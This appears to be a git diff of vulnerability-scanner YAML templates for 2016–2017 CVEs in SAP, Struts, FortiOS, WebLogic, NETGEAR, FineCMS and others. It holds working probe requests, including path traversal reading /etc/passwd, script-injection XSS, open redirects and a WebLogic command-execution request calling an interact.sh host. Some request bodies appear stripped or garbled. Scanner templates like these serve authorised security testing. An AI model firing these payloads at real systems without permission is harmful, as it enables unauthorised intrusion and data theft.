+ - https://www.exploit-db.com/exploits/39837/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-2389
cwe-id: CWE-22
- tags: cve,cve2016,lfi,sap
+ metadata:
+ shodan-query: http.favicon.hash:-266008933
+ tags: lfi,sap,packetstorm,edb,cve,cve2016
requests:
- method: GET
@@ -30,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml
index 25be5dcc99..54b0cc875b 100644
--- a/cves/2016/CVE-2016-3081.yaml
+++ b/cves/2016/CVE-2016-3081.yaml
@@ -1,14 +1,16 @@
id: CVE-2016-3081
info:
- name: Apache S2-032 Struts RCE
+ name: Apache S2-032 Struts - Remote Code Execution
author: dhiyaneshDK
severity: high
description: |
- Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.
+ Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).
reference:
- https://cwiki.apache.org/confluence/display/WW/S2-032
- https://struts.apache.org/docs/s2-032.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-3081
+ - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
@@ -30,3 +32,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml
index ba3b0c90c9..55055ec351 100644
--- a/cves/2016/CVE-2016-3088.yaml
+++ b/cves/2016/CVE-2016-3088.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-3088
cwe-id: CWE-20
- tags: fileupload,cve,cve2016,apache,activemq
+ tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
requests:
- raw:
@@ -25,7 +25,6 @@ requests:
{{randstr}}
- - raw:
- |
GET /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml
index 3477053651..eb558a9845 100644
--- a/cves/2016/CVE-2016-3978.yaml
+++ b/cves/2016/CVE-2016-3978.yaml
@@ -1,27 +1,30 @@
id: CVE-2016-3978
info:
- name: FortiOS (Fortinet) - Open Redirect and XSS
+ name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting
author: 0x_Akoko
severity: medium
- description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login."
+ description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
reference:
- - https://seclists.org/fulldisclosure/2016/Mar/68
+ - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2016-3978
+ - http://seclists.org/fulldisclosure/2016/Mar/68
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-3978
cwe-id: CWE-79
- tags: cve,cve2016,redirect,fortinet,fortios
+ tags: cve2016,redirect,fortinet,fortios,seclists,cve
requests:
- method: GET
path:
- - '{{BaseURL}}/login?redir=http://www.example.com'
+ - '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml
index af12271782..ad77d61eda 100644
--- a/cves/2016/CVE-2016-4975.yaml
+++ b/cves/2016/CVE-2016-4975.yaml
@@ -8,12 +8,12 @@ info:
reference:
- https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
+ remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-4975
cwe-id: CWE-93
- remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
tags: cve,cve2016,crlf,generic,apache
requests:
diff --git a/cves/2016/CVE-2016-4977.yaml b/cves/2016/CVE-2016-4977.yaml
index 2ec01bc852..2b7d032e7c 100644
--- a/cves/2016/CVE-2016-4977.yaml
+++ b/cves/2016/CVE-2016-4977.yaml
@@ -9,13 +9,14 @@ info:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://tanzu.vmware.com/security/cve-2016-4977
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
+ - https://pivotal.io/security/cve-2016-4977
+ remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-4977
cwe-id: CWE-19
- remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
- tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
+ tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring
requests:
- method: GET
diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml
index 1de8edc415..91a192e912 100644
--- a/cves/2016/CVE-2016-5649.yaml
+++ b/cves/2016/CVE-2016-5649.yaml
@@ -4,15 +4,17 @@ info:
name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
severity: critical
- description: "NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface."
+ description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-5649
+ - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
+ - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-5649
cwe-id: CWE-200
- tags: cve,cve2016,iot,netgear,router
+ tags: cve,cve2016,iot,netgear,router,packetstorm
requests:
- raw:
diff --git a/cves/2016/CVE-2016-6210.yaml b/cves/2016/CVE-2016-6210.yaml
deleted file mode 100644
index 45d87300e4..0000000000
--- a/cves/2016/CVE-2016-6210.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2016-6210
-
-info:
- name: OpenSSH username enumeration < v7.3
- author: iamthefrogy,forgedhallpass
- severity: medium
- description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
- reference:
- - http://seclists.org/fulldisclosure/2016/Jul/51
- - https://security-tracker.debian.org/tracker/CVE-2016-6210
- - http://openwall.com/lists/oss-security/2016/08/01/2
- - https://nvd.nist.gov/vuln/detail/CVE-2016-6210
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 5.9
- cve-id: CVE-2016-6210
- cwe-id: CWE-200
- tags: cve,cve2016,network,openssh
-
-network:
- - host:
- - "{{Hostname}}"
- - "{{Host}}:22"
-
- matchers:
- - type: regex
- regex:
- - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'
-
- extractors:
- - type: regex
- regex:
- - '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
\ No newline at end of file
diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml
index 71e0e92899..2d5c52ae75 100644
--- a/cves/2016/CVE-2016-6277.yaml
+++ b/cves/2016/CVE-2016-6277.yaml
@@ -1,20 +1,21 @@
id: CVE-2016-6277
info:
- name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
+ name: NETGEAR Routers - Remote Code Execution
author: pikpikcu
severity: high
- description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before
- 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
+ description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
reference:
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
+ - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
+ - https://www.kb.cert.org/vuls/id/582384
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-6277
cwe-id: CWE-352
- tags: cve,cve2016,netgear,rce,iot
+ tags: cve,cve2016,netgear,rce,iot,kev
requests:
- method: GET
@@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-6601.yaml b/cves/2016/CVE-2016-6601.yaml
new file mode 100644
index 0000000000..fe0fe71da5
--- /dev/null
+++ b/cves/2016/CVE-2016-6601.yaml
@@ -0,0 +1,32 @@
+id: CVE-2016-6601
+
+info:
+ name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
+ reference:
+ - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
+ - https://www.exploit-db.com/exploits/40229/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2016-6601
+ cwe-id: CWE-22
+ tags: edb,cve,cve2016,zoho,lfi,webnms
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml
index e7f153a0af..df8f83ffc4 100644
--- a/cves/2016/CVE-2016-7552.yaml
+++ b/cves/2016/CVE-2016-7552.yaml
@@ -4,16 +4,18 @@ info:
name: Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass
author: dwisiswant0
severity: critical
- description: "Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS."
+ description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
reference:
- https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
- https://nvd.nist.gov/vuln/detail/CVE-2016-7552
+ - https://github.com/rapid7/metasploit-framework/pull/8216/commits/0f07875a2ddb0bfbb4e985ab074e9fc56da1dcf6
+ - http://web.archive.org/web/20210516181625/https://www.securityfocus.com/bid/97599
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-7552
cwe-id: CWE-22
- tags: cve,cve2016,lfi,auth,bypass
+ tags: msf,cve,cve2016,lfi,auth,bypass
requests:
- method: GET
diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml
index e0dae32753..d69486f66c 100644
--- a/cves/2016/CVE-2016-7981.yaml
+++ b/cves/2016/CVE-2016-7981.yaml
@@ -1,12 +1,15 @@
id: CVE-2016-7981
info:
- name: SPIP 3.1.2 XSS
+ name: SPIP <3.1.2 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
- Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
+ SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
reference:
+ - https://core.spip.net/projects/spip/repository/revisions/23202
+ - https://core.spip.net/projects/spip/repository/revisions/23201
+ - https://core.spip.net/projects/spip/repository/revisions/23200
- https://nvd.nist.gov/vuln/detail/CVE-2016-7981
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +38,5 @@ requests:
part: header
words:
- text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml
index c820933c3f..32a3f7accb 100644
--- a/cves/2016/CVE-2016-8527.yaml
+++ b/cves/2016/CVE-2016-8527.yaml
@@ -1,19 +1,21 @@
id: CVE-2016-8527
info:
- name: Aruba Airwave - (XSS)
+ name: Aruba Airwave <8.2.3.1 - Cross-Site Scripting
author: pikpikcu
severity: medium
- description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS).
+ description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting.
reference:
- https://www.exploit-db.com/exploits/41482
+ - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
+ - https://www.exploit-db.com/exploits/41482/
- https://nvd.nist.gov/vuln/detail/CVE-2016-8527
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-8527
cwe-id: CWE-79
- tags: cve,cve2016,aruba,xss
+ tags: cve2016,aruba,xss,edb,cve
requests:
- method: GET
@@ -36,3 +38,5 @@ requests:
part: header
words:
- text/html
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml
index 6418b76c9a..78f216197b 100644
--- a/cves/2017/CVE-2017-0929.yaml
+++ b/cves/2017/CVE-2017-0929.yaml
@@ -1,19 +1,20 @@
id: CVE-2017-0929
info:
- name: DotNetNuke ImageHandler SSRF
+ name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery
author: charanrayudu,meme-lord
severity: high
- description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
+ description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
reference:
- https://hackerone.com/reports/482634
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
+ - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-0929
cwe-id: CWE-918
- tags: cve,cve2017,oast,ssrf,dnn,dotnetnuke
+ tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf
requests:
- method: GET
@@ -30,3 +31,5 @@ requests:
- type: status
status:
- 500
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml
index e118d21521..0695b8517b 100644
--- a/cves/2017/CVE-2017-1000028.yaml
+++ b/cves/2017/CVE-2017-1000028.yaml
@@ -1,19 +1,22 @@
id: CVE-2017-1000028
info:
- name: GlassFish LFI
+ name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion
author: pikpikcu,daffainfo
severity: high
- description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
+ description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.
reference:
- https://www.exploit-db.com/exploits/45196
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822
+ - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
+ - https://www.exploit-db.com/exploits/45196/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-1000028
cwe-id: CWE-22
- tags: cve,cve2017,oracle,glassfish,lfi
+ tags: oracle,glassfish,lfi,edb,cve,cve2017
requests:
- method: GET
@@ -37,3 +40,5 @@ requests:
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000029.yaml b/cves/2017/CVE-2017-1000029.yaml
index fe30a63635..a35fd3b8a1 100644
--- a/cves/2017/CVE-2017-1000029.yaml
+++ b/cves/2017/CVE-2017-1000029.yaml
@@ -1,15 +1,17 @@
id: CVE-2017-1000029
info:
- name: GlassFish Server Open Source Edition 3.0.1 - LFI
+ name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.
+ description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
reference:
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
- https://www.cvedetails.com/cve/CVE-2017-1000029
+ - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-1000029
cwe-id: CWE-200
@@ -29,3 +31,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml
index 2469274848..fe5f26d393 100644
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@@ -1,18 +1,21 @@
id: CVE-2017-1000170
info:
- name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+ name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
author: dwisiswant0
severity: high
- description: jqueryFileTree 2.1.5 and older Directory Traversal
+ description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
reference:
- https://www.exploit-db.com/exploits/49693
+ - https://github.com/jqueryfiletree/jqueryfiletree/issues/66
+ - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-1000170
cwe-id: CWE-22
- tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery
+ tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm
requests:
- method: POST
@@ -30,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml
index 703697b544..091a2595c1 100644
--- a/cves/2017/CVE-2017-1000486.yaml
+++ b/cves/2017/CVE-2017-1000486.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-1000486
cwe-id: CWE-326
- tags: cve,cve2017,primetek,rce,injection
+ tags: cve,cve2017,primetek,rce,injection,kev
requests:
- raw:
diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml
index c7c5da7c14..d5bc0d6f77 100644
--- a/cves/2017/CVE-2017-10075.yaml
+++ b/cves/2017/CVE-2017-10075.yaml
@@ -8,6 +8,7 @@ info:
reference:
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
+ - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index af77696479..dd344c5421 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -1,20 +1,21 @@
id: CVE-2017-10271
info:
- name: Oracle Fusion Middleware WebLogic Server - Remote Command Execution
- author: dr_set
+ name: Oracle WebLogic Server - Remote Command Execution
+ author: dr_set,ImNightmaree
severity: high
- description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
+ description: |
+ The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
reference:
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
- - https://www.oracle.com/security-alerts/cpuoct2017.html
+ - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10271
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2017-10271
- tags: cve,cve2017,rce,oracle,weblogic,oast
+ tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle
requests:
- raw:
@@ -41,7 +42,7 @@ requests:
-c
- nslookup {{interactsh-url}}
+ interact.sh
@@ -51,15 +52,47 @@ requests:
- matchers-condition: and
+ - |
+ POST /wls-wsat/CoordinatorPortType HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ Content-Type: text/xml
+
+
+
+
+
+
+
+
+
+
+
+
+ {{randstr}}
+
+
+
+
+
+
+
+
+
+ stop-at-first-match: true
+ matchers-condition: or
matchers:
- - type: word
- part: interactsh_protocol # Confirms the DNS interaction
- words:
- - "dns"
+ - type: dsl
+ dsl:
+ - regex(".*", body)
+ - status_code == 500
+ condition: and
- - type: status
- status:
- - 500
+ - type: dsl
+ dsl:
+ - body == "{{randstr}}"
+ - status_code == 200
+ condition: and
-# Enhanced by mp on 2022/04/20
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-10974.yaml b/cves/2017/CVE-2017-10974.yaml
index 1bef1f633f..52ff2715d0 100644
--- a/cves/2017/CVE-2017-10974.yaml
+++ b/cves/2017/CVE-2017-10974.yaml
@@ -1,19 +1,21 @@
id: CVE-2017-10974
info:
- name: Yaws 1.91 - Remote File Disclosure
+ name: Yaws 1.91 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
+ description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.
reference:
- https://www.exploit-db.com/exploits/42303
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
+ - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
+ - https://www.exploit-db.com/exploits/42303/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-10974
cwe-id: CWE-22
- tags: cve,cve2017,yaws,lfi
+ tags: edb,cve,cve2017,yaws,lfi
requests:
- method: GET
@@ -32,4 +34,6 @@ requests:
- type: dsl
dsl:
- - '!contains(tolower(body), ""
- ""
condition: and
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-11629.yaml b/cves/2017/CVE-2017-11629.yaml
new file mode 100644
index 0000000000..5cb529d6b9
--- /dev/null
+++ b/cves/2017/CVE-2017-11629.yaml
@@ -0,0 +1,43 @@
+id: CVE-2017-11629
+
+info:
+ name: FineCMS <=5.0.10 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
+ reference:
+ - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+ - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-11629
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2017,xss,finecms
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'pไธๅญๅจ'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml
new file mode 100644
index 0000000000..2931b0c317
--- /dev/null
+++ b/cves/2017/CVE-2017-12138.yaml
@@ -0,0 +1,37 @@
+id: CVE-2017-12138
+
+info:
+ name: XOOPS Core 2.5.8 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
+ reference:
+ - https://github.com/XOOPS/XoopsCore25/issues/523
+ - https://xoops.org
+ - https://www.cvedetails.com/cve/CVE-2017-12138
+ classification:
